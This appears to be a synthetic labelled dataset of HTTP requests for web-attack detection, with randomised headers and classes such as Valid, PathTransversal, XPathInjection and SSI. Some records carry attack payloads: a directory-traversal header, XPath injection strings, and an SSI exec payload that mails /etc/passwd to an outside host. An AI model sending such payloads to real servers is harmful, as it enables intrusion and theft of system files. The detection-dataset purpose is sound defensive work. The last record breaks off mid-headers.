Expect: 100-continue
From: 5uhy@ih5iar.uk
If-Modified-Since: Sat, 21 Jan 06 23:51:35 GMT
If-Unmodified-Since: Fri, 16 Sep 05 16:35:54 CET
If-Match: "dFuRUE9IJL_ONJZO71"
If-None-Match: "hFL-nNxVRpJmwLj2RUva"
If-Range: *
Max-Forwards: 8555
MIME-Version: 2.6
Pragma: aneQa='uvuhrd'
Authorization: fs3mas yynattw=lroh
Referer: /ecraoao/Rablrhie/trea.bin
Trailer: If-Unmodified-Since
User-Agent: o:\autoexec.bat
Via: 8.4 www.send.tiff, 5.1 137.57.99.49
Transfer-Encoding: identity
Upgrade: sn8ar/0.2, sdt/9.0
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3tqCboot.iniNrN-metaZ=h?\kh&rs=ai&liOm7eavSle=301549&qFzRaccept6= &tin4sIbe=ydc0Abfisxa

End - Id: 36188
Start - Id: 6753
class: Valid
POST /bseJt/lenmittaTtw9/D95FDI2pacceptVVM/5by1YxCoSmWeK.swf? HTTP/1.0
Content-Length: 43
Content-Language: rmgeisYe,aen
Content-Encoding: identity
Content-Location: http://fTysi.cz/e3isslA/eim8/lei6eIz/ssbr2elk/8gh82szk.js
Content-MD5: ZTdrdGwybnVxaW5vME9lZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 08:29:57 GMT
Last-Modified: Fri, 21 Apr 06 23:29:31 CET
Host: www.ihNozi.net
Connection: rNoia
Accept: video/quicktime;q=0.2, audio/x-wav, image/png
Accept-Charset: windows-1254;q=0.8, iso-8859-8-i;q=0.7, x-mac-icelandic;q=0.7, x-mac-japanese;q=0.5
Accept-Encoding: *
Accept-Language: uhkx-oeyiar, 9o-N;q=0.8, 83ifx-n, atasts-liM, a4-snWr;q=0.6
Cache-Control: no-store
Client-ip: 2.188.25.98
Cookie: smgraYmn=emeta;RB0uC0=3535976;ZBD@=2;ottaauafrwiiog=C8Amo4imac
Cookie2: $Version="73"
Date: Sat, 10 Jan 09 21:06:54 GMT
ETag: "96ywpGIsW84FLErbjO"
Expect: zoesod=39oesf
From: tm3ytg@tnto1ssawe.cz
If-Modified-Since: Wed, 23 Jul 08 24:09:14 UTC
If-Unmodified-Since: Tue, 13 Oct 09 08:19:11 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Dec 08 17:32:09 GMT
Max-Forwards: 95
MIME-Version: 8.5
Pragma: 8nwnsido='63ara2e'
Proxy-Authorization: NTLM azNlZXhoZW5kb3JlbmUycm01bW9ldGV0c2FuZ29jMXVzb29vUmV1
Authorization: Digest qop=otqt
Range: 2-
Referer: /tfmwar.png
TE: trailers,chunked
Trailer: Referer
User-Agent: Mozilla/3.1 (compatible; adlksc; Open BSD i586; enfdSenaee)
UA-CPU: PowerPC
UA-Disp: 342,103,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3268x616
Via: 5.9 29.72.3.218, Tinnd/2.3 www.ieuu.js, 3.7 www.euneawig.shtml
Transfer-Encoding: gzip
Upgrade: rie/7.4, 5Iena/2.4, fuca/0.7
Warning: 343 www.aS74.js "ImalcxyglU" "Sat, 10 Jul 04 23:42:51 UTC"
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 5587841310492306
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ooItnke9swps=43395156&s0zamgt9nncsoe=976066

End - Id: 6753
Start - Id: 33902
class: Valid
POST /oox/xBlyN/aM/xieoow/e9pmNV-PK4Wx6Y0L/Tezdv1lRjAimg/oWcat@/nm/rttIw/iwefismssymei8o467y/rupqjs0n.gif? HTTP/1.0
Content-Length: 157
Content-Language: a
Content-Encoding: gzip
Content-Location: http://eaiegar.st/dve4/hmuy/eercZ.bin
Content-MD5: ZDd0d3RiZWVpdGF3ZzBscQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 28 Apr 06 20:41:08 CET
Last-Modified: Sat, 11 Jun 05 18:08:58 CET
Host: www.h4zusvE.cz
Connection: byti1
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: gzip
Accept-Language: 4Ngon-ceenbt;q=0.6, ioaydse-mb, o9n7gtu-rTros
Cache-Control: only-if-cached
Client-ip: 79.8.5.10
Cookie: el3rose7dEhiq=haEi
Cookie2: $Version="187"
Date: Mon, 18 Jan 10 20:31:01 CET
ETag: "TYOwmuw6AZ9-ylnVknN"
Expect: kcer4ecw
From: tietc@t0ytt.net
If-Modified-Since: Mon, 30 Oct 06 09:50:43 CET
If-Unmodified-Since: Sun, 30 Jan 05 11:55:12 UTC
If-Match: "tNAX@b8OluPs7LKbSJlp"
If-None-Match: "icz-ICVgkrxkAtmMIZH"
If-Range: Sun, 19 Oct 08 11:15:50 CET
Max-Forwards: 7281
MIME-Version: 1.6
Pragma: rabgibv=tGrehtoa
Proxy-Authorization: Digest username="3htdpnp1"
Authorization: NTLM dGlhOHVBbm9xMnNpNHdBSGdobzhmZFppZHV0c2l2Um1yVm9uaWVub2U=
Range: 7-
Referer: /ieun/axsju.js
TE: chunked;q=0.7
Trailer: Warning
User-Agent: n2uoqsceoi (eseDlRp)
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1982x002
Via: HTTP/6.5 www.ugeem.tiff, tto/5.6 www.nmot.jpeg
Transfer-Encoding: gzip
Upgrade: tiA/0.9, ntKsa/7.2, 7Aeetb/2.3, Eili/1.5, lni/0.9
Warning: 989 201.150.171.195 "ttyrApoieD4se" "Wed, 19 Aug 09 22:23:21 CET"
X-Forwarded-For: 7.63.26.112
X-Serial-Number: 6132370347859311136
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

s3=nbetween~ libsne2insert&Ade4=6zWaAVZgA&fSN=+de&iidRg=111304340&maorruh=8&VnoHhnd=wUaxesaedKyu8oa&aesetdr=inCIh&iin6Siznv=88&autoexecnexecKh7S=66211125

End - Id: 33902
Start - Id: 46449
class: PathTransversal
PUT /DdbbKnlodwseeofsi/pnestllyioI/PMkDIlE5@Zl-FOG/hLUJ1U/aFs4onnejxrieheis7r/bmq2tkZWyjU1vog2MZm.sh? HTTP/1.0
Content-Length: 246
Content-Language: og,xhh,oMiir
Content-Encoding: compress
Content-MD5: bWx0aW9TZ3RobmFlOVNpZQ==
Content-Type: application/x-www-form-urlencoded
Host: www.x1noe.be:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: ../../../../var/log/access_log%00.html
Accept-Language: *;q=0.3
Cache-Control: min-fresh=926
Cookie2: $Version="0"
Date: Tue, 17 Mar 09 14:32:25 CET
If-Unmodified-Since: Fri, 18 Aug 06 04:42:17 UTC
If-None-Match: "UfrO9UjAzt3Otvk"
Pragma: oecea=iuH0t
Referer: /treudn/1kVwche/cCR8Awev/niseroi.nsf
TE: trailers,gzip
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 5.0; eC-ss; rv:0.8.7) Gecko/48730498
Via: 6.9 www.sP0yhm.htm, 3.2 www.rap5.css, nl0o/0.7 168.72.213.229

EVTXnmM%uDmail=94455&irpen9oninin=137&yRoenEcuGEOnte8=nn6i%3Bumixxp_Dmno%3Agj&easEsthp=us&uv2U=586668&Dsolaee=2848346755&qa37q5=085884&erondrs=rIU72J&adsx=8em.%40aJNwAH&rwItEo=C&ei8tmvxrk=9copy%3F5thaa&R4o1lldnreawhpn=Rs%7Cos%2Bwd+a&1TsXr=2650276

End - Id: 46449
Start - Id: 11266
class: Valid
GET /mO@vG5W/3WdLBUTgljHC-.F/aDg/9shspssptdt/uAM.9ETkOiYJZM3NrQen/tXPDMhUXoXp2.qJ5/rZ.x/esu4tsi7i8p4s/ohamjd/lIdMTLOJ_sbxNo/rrf5/ovhu4eoobahvneV.msf? HTTP/1.0
Host: 188.137.70.72
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: bjdninr-li51;q=0.7
Cache-Control: no-store
Client-ip: 153.188.24.187
Cookie: nCsweefw7Etn=4winnt6v
Cookie2: $Version="0"
Date: Fri, 09 Nov 07 09:58:55 UTC
ETag: W/"@qV_Ge1FmVOp5e@3kn8"
Expect: e7exuse9
From: udeo@jot2xbpben.it
If-Modified-Since: Thu, 25 Mar 04 20:04:13 GMT
If-Unmodified-Since: Wed, 26 Jan 05 18:51:09 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 12 Aug 04 22:26:26 UTC
Max-Forwards: 1
MIME-Version: 3.7
Pragma: g='laaukss7'
Proxy-Authorization: Basic b2xyYm9jYzp1bHVldFQ=
Authorization: NTLM cmFzSHNlWWFBSHJraGw5b2VzcnpUcG9uSXJ5b09jZXB3
Range: 394051-208299
Referer: http://www.8ikf.ch/etcluT/tieliE2v/onese.wmn
TE: chunked
Trailer: Pragma
User-Agent: Mozilla/8.5 (X11; U; Linux i386 4.9; it-eo; rv:3.6.5) Gecko/06665951
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 234x2210
Via: HTTP/5.3 186.104.173.233:8157, 3.3 www.hemnecti.gif:161
Transfer-Encoding: deflate
Upgrade: cTCcot/3.2, aonet/2.8, soci/4.8
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11266
Start - Id: 34472
class: Valid
POST /ht4deIiS/amOIUO.DwqOKc/nEM7j/tqwD..gif? HTTP/1.0
Content-Length: 154
Content-Language: tbece9ey
Content-Encoding: gzip
Content-Location: /iopr/roseD/m3haLdl/wveitoh/qnraed.tiff
Content-MD5: VGhObm5lc293VnNlYmJOcA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 18 Oct 07 15:09:12 UTC
Last-Modified: Sat, 20 Mar 04 16:04:07 CET
Host: 207.249.48.103
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.8, ks_c_5601-1987;q=0.2, koi8-r, cp-936;q=0.1
Accept-Encoding: *
Accept-Language: rt-e6;q=0.2, 0p8z-en1iMt2;q=0.5, zudubji-nrer;q=0.9, Trd7thoi-oer;q=0.7, eum-h
Cache-Control: it='tot'
Client-ip: 129.193.110.22
Cookie: DrOeToes6hcn=8925075;_tmpPJe-R=pe'y;psP2Bc=ih$BpipLam
Cookie2: $Version="55"
Date: Thu, 19 Feb 09 14:00:58 UTC
ETag: "0.-Cdz.K.lnhjlk3y"
Expect: 4ret=wd1dh
From: nS63m@sntnm9.biz
If-Modified-Since: Mon, 02 Feb 09 04:03:36 UTC
If-Unmodified-Since: Wed, 27 Feb 08 18:09:25 CET
If-Match: "JyGDwodjEk6wdD9zgM"
If-None-Match: *
If-Range: Sat, 06 Jun 09 23:09:08 UTC
Max-Forwards: 084
MIME-Version: 7.0
Pragma: sbsenxsp=irw
Proxy-Authorization: NTLM YUgxVGhpb1JibmtDdW5lUHJ6d293aWVhaWVlb2VpdWFycnllM1NodWl0ZG9t
Authorization: Digest algorithm=7sede
Range: -5776,-71560
Referer: http://www.seir1cer.com/iAy7g/oihMr.swf
TE: chunked
Trailer: Upgrade
User-Agent: rnicfpn/7.5.3.4
UA-CPU: StrongARM
UA-Disp: 563,2938,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3150x9630
Via: 0.6 135.70.214.207, HTTP/5.9 6.209.216.222:90818
Transfer-Encoding: gzip
Upgrade: 2nude/6.2, sdqEi/0.7
Warning: 184 116.163.25.21 "wlye" 
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 274973050
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xbtjyldlr=e0MSJ&QQ5-wzri=w|i&Iaa3=hPzj97Ry&xVJHbHTdelete=execHhaa@H\Je&mtli=aruppoSIo&vc5hryqy=j1VWr&Reteptnj1unoty=ib&lrp(nceot&rOdbPDS=cn8mnnr

End - Id: 34472
Start - Id: 35489
class: XPathInjection
GET /6kIuSUe0ULM/tnEebn/select8lVSAKAf/Dw9/earsvrue2a/ajvptySUjwLuXJn/H@/ohnLoode/iiedeateee3ne/dtG.RnkHmVE.T-8.jpg?een=mbrtfm&Y6eYJtqE0=8156&5atoiaelTere=v+are+%7Et%3CHIPw&LsAB-nELZinclude=04394 HTTP/1.1
Host: www.ocen.gov:80
Connection: rnoele
Accept: audio/*;q=0.5, text/html
Accept-Charset: iso-2022-jp, iso-8859-8, big5, x-mac-arabic;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Client-ip: 147.53.37.189
Date: Tue, 25 Sep 07 17:36:53 CET
From: r5s8seso@adlei.ch
MIME-Version: 4.9
Pragma: ia='0moSjsew'
Referer: /mfl4im/ixesoet/uh4l0sid.php3
User-Agent: aindm2i'   or    kcm/aditrs/child::node()[processing-instruction()=6]     or     'audc5oor'   ='
Transfer-Encoding: gzip

null

End - Id: 35489
Start - Id: 28954
class: Valid
GET /vuaPvIcperl4NH/lDiWlq_.html?ns5hsbpuoaeE=46835470&e3incyo1hrohrd=470 HTTP/1.1
Host: www.srm9hnh.gov:8
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.5, x-mac-japanese
Accept-Encoding: *
Accept-Language: rsir-an9baSv;q=0.0, Sen5fhs-y9uigs, rnaos-atuilsE;q=0.5, xxCeAa-ostthhn, teSn7m-ozbs;q=0.7
Cache-Control: only-if-cached
Client-ip: 26.226.102.173
Cookie: rh=ooSdjRinie/e r;Uinjf10aah= i2fta6ln;ng=n4z+h;Iene0nx=0;JFEP=351420599;sgn4liintaUSh=8tniJtko~tCnm0as
Cookie2: $Version="89"
Date: Tue, 30 Aug 05 03:46:10 GMT
ETag: "0tsajjB5_ft4NJsI"
Expect: 100-continue
From: h5hrlh@Esuhia1.cz
If-Modified-Since: Sat, 03 Nov 07 15:38:42 CET
If-Unmodified-Since: Sun, 12 Jul 09 23:48:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: NTLM czFjaGFhYm1ybnRoaWFlbWVzM2F0M2lsNm5jb2VhdGxhcnBmMWdpZWI=
Authorization: Digest username="Egnoz"
Range: -332385,-432,1995-63
Referer: http://r9tsx.net/nfslwjne/sbitdNnr/bsli0f/1hprfe/oRDdpvsl.php
TE: gzip;q=0.5,gzip,gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/5.4 (Windows; U; Windows NT 7.9; EV-do; rv:8.7.8) Gecko/69424175
UA-CPU: MIPS
UA-Disp: 3550,9047,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1053x1221
Via: HTTP/2.3 176.128.255.193:1174, 2.0 237.102.67.192
Transfer-Encoding: compress
Upgrade: SDtt/0.6, mnhrp/9.3, edgePn/8.1
Warning: 060 221.176.165.132 "oh3respRbbacere" "Fri, 16 Mar 07 05:27:50 UTC"
X-Forwarded-For: 108.24.111.61
X-Serial-Number: 7184697
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 28954
Start - Id: 18607
class: Valid
GET /aaaca/cqV.gif?ISZ4jnJVy=66900630&Te0oms=%2Botmp&niss=u&hsLr=xsam20a&NzwR4=m8zH&ogusses1=3j%3DhnodnaIave&37BUi=ae&n38sey=onet5nnA&K8i=xxUkPCFDJxrc&Mf7i=aGn-V1Vb4&Odegaeh7wra=a6rAus7t&aoo=wenepbnesdgaae&cirfhoO=479435 HTTP/1.0
Host: www.Ur6qsiRbt.net
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 92.140.82.89
Cookie: es4ou2eoi=n;jhHechoftsjalru;N-Nnc=224349;ctswa=[a4Roiwdn3w;snaheoch1eeE=5581;shtdOvaklai=wolo8arqu8b7ur
Cookie2: $Version="2"
Date: Wed, 01 Jul 09 21:36:32 UTC
ETag: "@LZVa7ZT2QWniMH"
Expect: pdNhf7t=de0aert
From: DddWxe@lancnuyuae.it
If-Modified-Since: Tue, 05 Aug 08 09:22:25 GMT
If-Unmodified-Since: Sun, 18 Mar 07 24:15:44 GMT
If-Match: "kOjhTvGurwLNQ6mJ"
If-None-Match: *
If-Range: "6A5VfAQewxAj.PZo"
Max-Forwards: 687
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic YUREcG5hOnN0N2M=
Authorization: Basic dGU4ckVzYXg6b2pidA==
Range: 0-15536,8-008663
Referer: /hE7twe/moee/jotz.shtml
TE: chunked;q=0.7,gzip;q=0.4
Trailer: Max-Forwards
User-Agent: tTnqnela/1.7
UA-CPU: Sparc
UA-Disp: 1268,0056,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8012x674
Via: HTTP/2.1 255.241.235.105, FTP/1.0 www.xarciasa.shtml
Transfer-Encoding: identity
Upgrade: fsooht/0.4, Rtho/8.1
Warning: 224 www.anwi.tiff:36 "snstrTt" "Mon, 04 Jun 07 16:58:27 GMT"
X-Forwarded-For: 72.228.20.6
X-Serial-Number: 74074067
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 18607
Start - Id: 15009
class: Valid
GET /6ruIrejlhab.tiff?HQzgKqMHbfXP=nOgsee&eae=989&eEPvoShriomnsig=lhd39yMQfezb&Aaccepti_kr=9480237 HTTP/1.0
Host: www.lEleea.uk
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic, windows-1250, windows-1251;q=0.9, iso-8859-4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=7262
Client-ip: 67.100.167.193
Cookie: aqr=/n >e]et|oe'bgsound|Te;a4hodx5ta=653;rtredpN8=90019;oanoMtt=8981
Cookie2: $Version="375"
Date: Sun, 18 Dec 05 01:32:36 UTC
ETag: "5.iV125tRk10IjkqbYn"
Expect: wsWt
From: ol9n@oiatmee.uk
If-Modified-Since: Sun, 20 May 07 17:10:04 GMT
If-Unmodified-Since: Thu, 09 Apr 09 21:03:45 CET
If-Match: "fT9OwaE2eAP3-O8Cj"
If-None-Match: "wS3bCEgbfBq2FKaFo"
If-Range: Wed, 27 Oct 04 05:58:10 UTC
Max-Forwards: 657
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM dXN3OWpibnlBYWU0cWlzc2VreVdlc2NlcnJlMzNFZWlkbWh0c0Vza3NuSml5Yw==
Authorization: Digest algorithm=nt34goit
Range: 438364-
Referer: http://aMarn.net/tteno/csaT/Aa69J/spfninAv/hEejee.asp
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: rcja2T
UA-CPU: StrongARM
UA-Disp: 5420,670,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7618x6392
Via: FTP/9.0 142.235.124.178
Transfer-Encoding: isdri; te6n=qdwmt
Upgrade: rotyo/7.0, 8her6/3.5, erjkwi/8.1, 4env6/4.2, oh0n/5.8
Warning: 018 www.le4noeG.jpg "sgcenjna" 
X-Forwarded-For: 19.245.59.143
X-Serial-Number: 958943826904140
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15009
Start - Id: 8766
class: Valid
GET /tgnW8t/npWll@RwNZnTFyAsJ/TFYfR-fu-metaWpiscript.jpeg?sgMena=160&twk=879&oSeesnynin=mX9oURx&ieenl=abedE&iunAelHNnesttu=ta3SG7EBx&rntwee=et%5Cmpt2 HTTP/1.1
Host: 217.175.213.142
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress
Accept-Language: *;q=0.3
Cache-Control: a4stoe=nb0deal
Client-ip: 176.247.52.54
Cookie: AouFts=7e8nr;rof2rhcrsu67=enzeeval;MzKrI_.=43;tte1t7rnoiodaa=oT6;rSuhrqei= tei;u4dN=inWPad
Cookie2: $Version="149"
Date: Fri, 09 Jan 04 15:28:04 CET
ETag: W/"mN-q7y62RCi4Ex1"
Expect: 100-continue
From: xrVtdi5@b55e.cz
If-Modified-Since: Wed, 14 Jan 09 21:41:16 UTC
If-Unmodified-Since: Sat, 09 Apr 05 17:44:54 GMT
If-Match: *
If-None-Match: *
If-Range: "rCHEEuQsTACz@qHGL"
Max-Forwards: 88
MIME-Version: 8.3
Pragma: nqtzf=i
Proxy-Authorization: Basic OWVxbjplZUJBaA==
Authorization: Basic R2ltZDpndHRh
Range: -914608,-7
Referer: /oiyP9/aeedeotp/Tldre/cpbo7/aewkqhmy.pl
TE: trailers,chunked,gzip
Trailer: Trailer
User-Agent: Mozilla/5.9 (Windows; U; Win98 3.6; ee-x9; rv:0.9.9) Gecko/88607650
UA-CPU: Sparc
UA-Disp: 608,0739,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 3952x6692
Via: 0.0 240.74.172.242
Transfer-Encoding: gzip
Upgrade: r0eEiT/8.6, htI/9.8, ege/8.8, H6lSS/0.3, hdcioa/7.8
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8766
Start - Id: 1973
class: Valid
GET /r4V1DeNypPCRMPc/mh6hainisttsht47n/lsa1npIideln0e/7tedutrheon75Rhotir/yyNd.htm?pfce=htzi&lkoxcsecowm=ianspnw&netTtvinia5=167&netcatFOER9km=scle+emaileLi&tlatadaneni=iipp&sA1oEhho=M%40es%3AeOzinoa&JNSk=0993&vS82CPzuAESU=62270&radtegspad=tm%3D&jniati6aEodntFn=8 HTTP/1.1
Host: 134.111.220.149
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: weho-t7s8;q=0.7, u2loseas-Ve4ao;q=0.9
Cache-Control: no-transform
Client-ip: 200.2.254.145
Cookie: mcbconnectuvoR=ho1Deedh71;de=6SrgCe6CK6vL;le=vbscript-ebrr]anghe/aaf;LKdiy=b;qSnndeWwcml=8341;she0awt8sm4tb=2949342
Cookie2: $Version="444"
Date: Fri, 20 Feb 09 02:52:13 UTC
ETag: "C@PWa3qZSylm.3Y"
Expect: 100-continue
From: ntlbbxru@destaueare.gov
If-Modified-Since: Tue, 17 Jul 07 12:18:09 GMT
If-Unmodified-Since: Wed, 02 Dec 09 22:22:12 UTC
If-Match: "Cxi0s8mN7N-j5Tl"
If-None-Match: "lKCybfwWTt0mMQZ"
If-Range: Mon, 27 Oct 08 06:50:31 GMT
Max-Forwards: 7736
MIME-Version: 3.2
Pragma: re2n=ltzgcr
Proxy-Authorization: wiohon Esah=2tadyd
Authorization: Digest nonce
Range: 907906-,4755-184
Referer: /taia/oaiirntv/tu7eoarw.gz
TE: trailers
Trailer: Date
User-Agent: 8lArTIG/5.7.2
UA-CPU: MIPS
UA-Disp: 348,029,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 396x457
Via: 3.5 www.sawFsea.tiff
Transfer-Encoding: deflate
Upgrade: uhe/2.1, fhfev3/6.7, nebdfl/5.2
Warning: 739 www.4orhb5e1.shtml "oesmfaarosEeo" "Tue, 28 Dec 04 23:39:24 UTC"
X-Forwarded-For: 218.173.209.61
X-Serial-Number: 189729230
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1973
Start - Id: 40060
class: SSI
GET /7O6onne8uaup.jpeg?enerdnaha=8480697367&ku=duinmetap&Ntelolf=heaHed7f3iodti&ywtwaEade=TuTie&z2org=8&qeS=eoaftrouriteh8wd&br=Utnph-&eoLos=nh%29df&6rzgri6ei=6&tC=mae&mstPoaIxpe=80217014&_i6Cpv4=tp+1+n3SwtNi0ad8es&h0=falag6&yoedhh7udh=%3C%21--+++++%23exec++cmd%3D%22%2Fbin%2Fmail+++++emsoseeo.com+%3C++%2Fetc%2Fpasswd%22--%3E HTTP/1.0
Host: 210.51.156.40:30360
Connection: close
Accept: */*
Accept-Charset: x-mac-ce;q=0.7
Accept-Encoding: identity, deflate;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 152.166.126.235
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="54"
Date: Wed, 05 Nov 08 04:23:45 CET
ETag: W/"kZJu3IoTYGcSKFBiD@c"
Expect: ursla2l
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Fri, 30 Apr 04 12:49:37 CET
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: *
If-None-Match: "cooLCjGjNSxKSywuVt"
If-Range: "2xVwbdu7L_p3UgWPX6S8"
Max-Forwards: 173
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM bmVtZWRlNGJvcG1nc2VNY3Z2ZWU0ZWI0c29sYXRuRW0xb2hzbjBrZ3Rzcw==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 8082-34430,77209-030140,-38
Referer: http://www.DraeEt.fr/o2wnltei.tar
TE: trailers,gzip,deflate;q=0.0
Trailer: User-Agent
User-Agent: Mozilla/9.8 (compatible; Konqueror/3.7; Unix; maonaurwj; P52tin; ohaT8)
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8002x1361
Via: 8.9 157.177.121.60, 3.4 www.d8trTeI.htm
Transfer-Encoding: stnnvl
Upgrade: eyee/8.5, tmg/7.0
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 02001
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40060
Start - Id: 48735
class: XPathInjection
GET /Gln/xiCcws8-zeZTiC/wubVEaFgAwgetD@/aL.Vg0HQJgiJ@/oMVOn1aDR7ojdQqnjNAz/1t0UyBys_M4QvO/9lne4cigm.php3?h81atdoox=9&tltetaA=c83nc&tti2m=99402&sohse=S6o+35suifiqpe4&iitG6hzy=i9nt%27+++++or+++%28i+%3C++count%28ruRti%2Fchild%3A%3Atext%28%29%29+++++and+++++j+++%3C+++++count%28eima%2Fchild%3A%3Acomment%28%29%29+++and++k+++%3C+++++count%28bFnmya%2Fchild%3A%3A*%29++++%29++++or++++%274ps%27+%3D+++%27++uaUEE%27+or&catnRz=lxPyY9FQk&segNfAdiL=52581&myasemaTitH4b=ruic6rel0leduof&tnfmeoec1ihr=75565480&dNternee=9998&3Toqtn=83403450&rpt11r1=3esoeg&ntotot=eTNc&ieefsdioe=e%40erlhh HTTP/1.0
Host: 92.17.198.65:42
Connection: 2eqacn0f
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ft6-v;q=0.1, nn-e2sl
Cache-Control: no-store
Client-ip: 80.135.128.144
Cookie: fromndocumentUnwindow.openY4xGO=173832;teloz=a6c;psloat1sscb=utp=1idli2;giuequrctrs=ce?or
Cookie2: $Version="20"
Date: Sun, 29 Nov 09 17:53:05 UTC
ETag: "BNYgiCLjg9lbGVfj_6"
Expect: thslw=abtirt;neba
From: wdlEt@aLnyEae.st
If-Modified-Since: Tue, 10 Feb 04 04:03:52 UTC
If-Unmodified-Since: Tue, 30 Jun 09 22:10:07 CET
If-Match: "bDjXKY.nSPaQoaf_@7"
If-None-Match: "ouf46Y8B3iLeq3WU1"
If-Range: Tue, 20 Mar 07 23:05:13 GMT
Max-Forwards: 945
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest uri=/otrw4ske.cfm
Authorization: NTLM Y3ByYXZ0cmV1d2VmeWZscjhmZWllNTZhZm9lZW9XcmdvYmVhZEh0d25zZWhndg==
Range: 328-,-79624
Referer: http://www.tlkrse6.uk/huomre/elaodl/qrxys72u/Tdaenii9/aittP.gz
TE: deflate;q=0.8,deflate
Trailer: Upgrade
User-Agent: Mozilla/0.2 (Windows; U; WinNT 2.0; se-he; rv:7.3.4) Gecko/28809693
UA-CPU: Sparc
UA-Disp: 383,7036,16
UA-OS: Windows 98
UA-Pixels: 9907x836
Via: 1.7 222.64.33.192, 6.7 www.hpy7al4.jpg
Transfer-Encoding: dojtaa; dWs8ttey=hozsfth
Upgrade: tSnw/7.9, a5m/6.7, fogi0/2.6, alEi/8.0
Warning: 669 www.nfgu.shtml "3kai" 
X-Forwarded-For: 251.236.113.138
X-Serial-Number: 3865979
----: ------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48735
Start - Id: 11400
class: Valid
GET /sB7/lG_ewc/tnoeibatthoo/h_IhJlb9y7iUuX/tsdireN0s/h4JEk485q6CW.oFPwZg/ftomdfurcsne/ie4entiasailochehh/UoqpsFMF/eq.html? HTTP/1.0
Host: 79.0.209.120
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip;q=0.0, gzip, compress, identity;q=0.5
Accept-Language: *
Cache-Control: no-transform
Client-ip: 178.230.95.66
Cookie: rsAqy5mtoucnr=byioToNnsnulloeilW;izoGgmcSame=56587767;AfhtThLErh=nEtorjEch7e;ti=702805
Cookie2: $Version="98"
Date: Wed, 30 Mar 05 10:42:53 CET
